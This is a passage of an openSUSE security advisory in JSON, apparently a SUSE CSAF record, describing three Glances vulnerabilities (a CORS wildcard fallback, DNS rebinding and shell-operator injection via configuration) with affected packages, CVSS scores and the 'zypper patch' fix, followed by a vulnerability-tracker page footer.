"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s) introduced a configurable CORS origin list in version 4.5.3 as a mitigation for CVE-2026-33533. However, the implementation silently falls back to Access-Control-Allow-Origin: * whenever cors_origins contains more than one entry. An operator who configures an explicit two-entry allowlist (e.g. two internal dashboard origins) intending to restrict browser access instead receives the unrestricted wildcard. A malicious web page served from any origin can issue a CORS simple request to /RPC2 and read the full system monitoring dataset without the victim\u0027s knowledge. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46608",
"url": "https://www.suse.com/security/cve/CVE-2026-46608"
},
{
"category": "external",
"summary": "SUSE Bug 1268855 for CVE-2026-46608",
"url": "https://bugzilla.suse.com/1268855"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46608"
},
{
"cve": "CVE-2026-46611",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46611"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s, implemented in glances/server.py) does not validate the HTTP Host header, leaving it vulnerable to DNS rebinding attacks. An attacker can exploit DNS rebinding to exfiltrate the full system monitoring dataset from a victim\u0027s browser. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46611",
"url": "https://www.suse.com/security/cve/CVE-2026-46611"
},
{
"category": "external",
"summary": "SUSE Bug 1268856 for CVE-2026-46611",
"url": "https://bugzilla.suse.com/1268856"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-46611"
},
{
"cve": "CVE-2026-53925",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-53925"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. From 4.0.8 until 4.5.5, the secure_popen() function in glances/secure.py interprets \u003e (file redirection), | (pipe), and \u0026\u0026 (command chaining) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command. When Application Monitoring Process (AMP) modules load their command or service_cmd configuration values from glances.conf, those values are passed directly to secure_popen() with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via \u003e), chain arbitrary commands (via \u0026\u0026), or pipe command output to arbitrary programs (via |). This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-53925",
"url": "https://www.suse.com/security/cve/CVE-2026-53925"
},
{
"category": "external",
"summary": "SUSE Bug 1268984 for CVE-2026-53925",
"url": "https://bugzilla.suse.com/1268984"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-53925"
}
]
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…